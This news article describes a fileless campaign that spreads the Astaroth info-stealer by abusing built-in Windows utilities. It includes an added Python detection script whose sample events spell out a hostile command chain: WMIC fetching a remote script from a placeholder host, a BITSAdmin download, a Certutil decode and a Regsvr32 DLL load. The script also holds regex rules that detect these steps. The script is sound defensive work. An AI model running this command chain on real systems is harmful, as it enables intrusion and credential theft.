A fileless campaign is dropping the Astaroth info-stealer

Attackers are delivering the Astaroth info-stealing backdoor by leveraging a combination of fileless malware and “living off the land” techniques, Microsoft’s security team warns.

The campaign

All through the attack chain, the only tools and utilities used are those already present on most Windows systems: WMIC, BITSAdmin, Certutil, Regsvr32 and Userinit.

The attack starts with spear-phishing emails targeting employees and tricking them into following the included link to an archive file, and ends with Astaroth being run directly in memory (injected into the Userinit process).


“For traditional, file-centric antivirus solutions, the only window of opportunity to detect this attack may be when the two DLLs are decoded after being downloaded—after all, every executable used in the attack is non-malicious,” says Andrea Lelli, a member of the Windows Defender ATP team.

“If this were the case, this attack would pose a serious problem: since the DLLs use code obfuscation and are likely to change very rapidly between campaigns, focusing on these DLLs would be a vicious trap.”

Instead, defenders should focus on spotting fileless techniques, some of which may be so unusual and anomalous that they draw immediate attention to the malware.

In fact, this is how Microsoft spotted this specific campaign: their telemetry showed noticeable spikes in the use of the WMIC tool to run a script.
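As an added illustration (not code from the article or from Microsoft's report), the following Python script applies the detection idea above to a few constructed process-creation events: it flags the living-off-the-land patterns named in the attack chain plus a Userinit process with an unexpected parent, then reports hosts where several of those signals line up. The command-line switches it matches are assumptions drawn from the utilities' documented options, not details given on this page.

```python
import re

# Constructed sample process-creation events: (host, parent image, image, command line).
# These are made-up lines for illustration only, not real telemetry.
EVENTS = [
    ("host1", r"C:\Windows\explorer.exe", r"C:\Windows\System32\wbem\WMIC.exe",
     r'wmic os get /format:"http://example.invalid/update.xsl"'),
    ("host1", r"C:\Windows\System32\wbem\WMIC.exe", r"C:\Windows\System32\bitsadmin.exe",
     r"bitsadmin /transfer job /download /priority high http://example.invalid/a.txt C:\Users\Public\a.txt"),
    ("host1", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\certutil.exe",
     r"certutil -decode C:\Users\Public\a.txt C:\Users\Public\a.dll"),
    ("host1", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\regsvr32.exe",
     r"regsvr32 /s C:\Users\Public\a.dll"),
    ("host1", r"C:\Windows\System32\regsvr32.exe", r"C:\Windows\System32\userinit.exe", "userinit.exe"),
    ("host2", r"C:\Windows\System32\winlogon.exe", r"C:\Windows\System32\userinit.exe", "userinit.exe"),
    ("host2", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\wbem\WMIC.exe", "wmic os get caption"),
]

# (rule name, image file name, command-line pattern). Switch names are assumptions
# based on each utility's documented usage, not values taken from the article.
RULES = [
    ("wmic_remote_script", "wmic.exe", re.compile(r'/format:\s*"?https?://', re.I)),
    ("bitsadmin_download", "bitsadmin.exe", re.compile(r"/transfer\b", re.I)),
    ("certutil_decode", "certutil.exe", re.compile(r"-decode\b", re.I)),
    ("regsvr32_user_writable_dll", "regsvr32.exe",
     re.compile(r"\\(users|temp|appdata)\\.*\.dll", re.I)),
]

def image_name(path):
    """Return the lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()

def match_event(host, parent, image, cmdline):
    """Return the list of rule names a single event trips."""
    hits = []
    name = image_name(image)
    for rule, exe, pattern in RULES:
        if name == exe and pattern.search(cmdline):
            hits.append(rule)
    # Userinit is normally started by winlogon; any other parent is anomalous.
    if name == "userinit.exe" and image_name(parent) != "winlogon.exe":
        hits.append("userinit_unexpected_parent")
    return hits

def detect(events):
    """Flatten all (host, rule) findings across the event stream."""
    return [(host, rule) for host, parent, image, cmd in events
            for rule in match_event(host, parent, image, cmd)]

def hosts_over_threshold(findings, threshold=3):
    """Hosts tripping several distinct rules: a chain of LOLBin use, not isolated noise."""
    per_host = {}
    for host, rule in findings:
        per_host.setdefault(host, set()).add(rule)
    return sorted(h for h, rules in per_host.items() if len(rules) >= threshold)
```

Running `hosts_over_threshold(detect(EVENTS))` returns `["host1"]`, the host whose events form the full chain; host2's benign WMIC query and winlogon-spawned Userinit trip nothing.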

Similar previous attacks

The attackers delivering Astaroth have been at it for quite a while, and their techniques are evidently successful enough that they only make minor modifications between campaigns.

For example, in the campaign detailed by Cybereason researchers in February 2019, the attackers also misused the WMIC and BITSAdmin utilities, as well as Userinit (if another process common on targeted Brazilian machines wasn’t available).

They also took advantage of a component of Avast AV to gain information about the target system.

Both of these campaigns have been heavily targeting Brazilian users/organizations.
